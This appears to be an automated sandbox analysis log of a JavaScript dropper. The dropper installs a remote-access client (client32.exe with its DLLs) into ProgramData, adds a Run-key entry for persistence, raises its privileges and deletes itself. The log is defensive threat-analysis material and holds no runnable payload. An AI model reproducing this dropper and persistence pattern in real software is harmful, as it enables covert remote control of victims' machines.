                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1100892B5_2_1100892B
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1101CF305_2_1101CF30
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\4dvs23l\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 11161299 appears 88 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 11027F40 appears 94 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 11164ED0 appears 64 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 110B7EF0 appears 36 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 6C606F50 appears 42 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 11147060 appears 1221 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 1105E820 appears 639 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 1105E950 appears 60 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 111744C6 appears 38 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 11147AD0 appears 51 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 6C617D00 appears 47 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 11081E70 appears 83 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 1109DCE0 appears 32 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 11029A70 appears 2101 times
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: String function: 1116FED0 appears 72 times
                                Source: 5j0fix05fy.jsInitial sample: Strings found which are bigger than 50
                                Source: classification engineClassification label: mal100.rans.evad.winJS@5/21@3/3
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110F91B0 GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,GetSystemDirectoryA,LoadLibraryExA,GetLastError,FormatMessageA,LocalFree,_memmove,4_2_110F91B0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,4_2_1109D860
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,4_2_1109D8F0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,5_2_1109D860
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,5_2_1109D8F0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,4_2_11116880
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11089430 FindResourceA,LoadResource,LockResource,4_2_11089430
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,5_2_11128B10
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yyy[1].zipJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\temp\quit_2.icoJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5j0fix05fy.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\4dvs23l\client32.exe "C:\ProgramData\4dvs23l\client32.exe"
                                Source: unknownProcess created: C:\ProgramData\4dvs23l\client32.exe "C:\ProgramData\4dvs23l\client32.exe"
                                Source: unknownProcess created: C:\ProgramData\4dvs23l\client32.exe "C:\ProgramData\4dvs23l\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\4dvs23l\client32.exe "C:\ProgramData\4dvs23l\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: zipfldr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: shdocvw.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winshfhc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winshfhc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winshfhc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winshfhc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winshfhc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winshfhc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winshfhc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile written: C:\ProgramData\4dvs23l\client32.iniJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: 5j0fix05fy.jsStatic file information: File size 6302081 > 1048576
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\ProgramData\4dvs23l\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: ie_to_edge_bho_64.dll.0.drStatic PE information: section name: .gxfg
                                Source: ie_to_edge_bho_64.dll.0.drStatic PE information: section name: .retplne
                                Source: ie_to_edge_bho_64.dll.0.drStatic PE information: section name: _RDATA
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11041721 push 3BFFFFFEh; ret 4_2_11041726
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1116FF15 push ecx; ret 4_2_1116FF28
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1116AE09 push ecx; ret 4_2_1116AE1C
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11041721 push 3BFFFFFEh; ret 5_2_11041726
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1116FF15 push ecx; ret 5_2_1116FF28
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1116AE09 push ecx; ret 5_2_1116AE1C
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\temp\ie_to_edge_bho.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\client32.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\temp\ie_to_edge_bho_64.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\temp\ie_to_edge_bho.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\client32.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\temp\ie_to_edge_bho_64.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\4dvs23l\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_6C617030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,4_2_6C617030
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,5_2_11128B10
                                Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                                Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Deletes itself after installation
                                Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\5j0fix05fy.jsJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,4_2_110C1020
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11113380 IsIconic,GetTickCount,4_2_11113380
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_11025A90
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113FA0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11025EE0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1115BEE0 SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115BEE0
